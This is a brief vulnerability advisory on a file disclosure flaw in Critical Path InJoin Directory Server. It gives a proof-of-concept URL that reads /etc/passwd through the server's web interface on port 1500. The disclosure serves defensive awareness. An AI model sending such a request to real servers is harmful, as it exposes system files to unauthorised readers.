Critical Path InJoin Directory Server File Disclosure Vulnerability

Critical Path InJoin Directory Server File Disclosure Vulnerability

The following examples were provided as a proof-of-concept:

http://ip:1500/CONF&LOG=/etc/passwd&NOIH=no&FRAMES=y

Here the attacker is able to view the contents of /etc/passwd.